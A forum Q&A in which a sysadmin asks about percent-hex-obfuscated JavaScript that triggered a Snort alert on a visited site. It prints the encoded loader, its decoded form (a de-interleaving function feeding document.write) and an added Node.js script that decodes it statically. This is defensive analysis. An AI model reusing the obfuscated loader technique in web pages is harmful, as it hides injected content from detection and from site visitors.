
I'm a SysAdmin that doesn't know much about JavaScript.

I recently started running Snort on a network and it gave me the alert "ET WEB_CLIENT Hex Obfuscation of document.write % Encoding" on a website one of my users visited. Looking at the Snort rule and the HTML/JavaScript on the site I was able to find the following that I think triggered the rule:

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%73%52%73%52%73%52%73%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b%52%73%52%73%52%73%52%73%28%77%6c%6b%6a%69%29%3b")); 

I ran that block of JavaScript through a HexDecoder (http://ddecode.com/hexdecoder/) and got the following:

eval(unescape("function RsRsRsRs(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www)    hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};RsRsRsRs(wlkji);"));

Can anyone point me in the right direction to continue decoding this to determine what it might be doing?

user51279

1 Answer


Can anyone point me in the right direction...

Just open your browser's web console and paste it in, without the eval( at the beginning and the final ) at the end. That will show you the code it's trying to run, without running it.

You can take it further by taking the resulting

function RsRsRsRs(teaabb) {
    var tttmmm = "";
    l = teaabb.length;
    www = hhhhffff = Math.round(l / 2);
    if (l < 2 * www) hhhhffff = hhhhffff - 1;
    for (i = 0; i < hhhhffff; i++) tttmmm = tttmmm + teaabb.charAt(i) + teaabb.charAt(i + hhhhffff);
    if (l < 2 * www) tttmmm = tttmmm + teaabb.charAt(l - 1);
    document.write(tttmmm);
};
RsRsRsRs(wlkji);

...which defines and then calls a function and changing the document.write part of it to console.log, so you can see what it's trying to put into the document.

But there must be more to it, as the end is trying to use a variable that doesn't exist.

j08691
T.J. Crowder
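
The decoding steps from the answer above, written as a script that runs under Node.js outside the browser so that nothing is evaluated or written into a page. This is an added example, not part of the original answer: the helper names `decodePercentHex`, `peelEvalUnescape`, `deinterleave` and `interleaveEncode` are assumptions made here, and the sample string is constructed because `wlkji` does not appear on the page.

```javascript
// Added example: static analysis helpers; nothing is eval'd or written to a page.

// Decode %XX escapes the way unescape() does for single-byte values.
function decodePercentHex(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Pull the string literal out of eval(unescape("...")) and decode it as text.
function peelEvalUnescape(src) {
  const m = /eval\s*\(\s*unescape\s*\(\s*(["'])([\s\S]*?)\1\s*\)\s*\)/.exec(src);
  return m ? decodePercentHex(m[2]) : null;
}

// Same logic as the page's RsRsRsRs(), with local variables and a return
// value in place of document.write().
function deinterleave(encoded) {
  const l = encoded.length;
  const www = Math.round(l / 2);
  const half = l < 2 * www ? www - 1 : www; // odd length: last char appended below
  let out = "";
  for (let i = 0; i < half; i++) {
    out += encoded.charAt(i) + encoded.charAt(i + half);
  }
  if (l < 2 * www) out += encoded.charAt(l - 1);
  return out;
}

// Inverse transform, used only to build test input (hypothetical helper).
function interleaveEncode(plain) {
  const half = Math.floor(plain.length / 2);
  let evens = "", odds = "";
  for (let i = 0; i < half; i++) {
    evens += plain.charAt(2 * i);
    odds += plain.charAt(2 * i + 1);
  }
  const tail = plain.length % 2 ? plain.charAt(plain.length - 1) : "";
  return evens + odds + tail;
}

// First 17 escapes of the page's payload, wrapped the same way.
const layer1 = 'eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%73%52%73%52%73%52%73"));';
console.log(peelEvalUnescape(layer1));

// Constructed stand-in for the page's undefined wlkji variable.
const sample = interleaveEncode("<p>constructed sample markup</p>");
console.log(JSON.stringify(deinterleave(sample)));
```

The function only re-interleaves the first and second halves of its input, so the markup a page actually injects depends on the value assigned to `wlkji` elsewhere in that page's source.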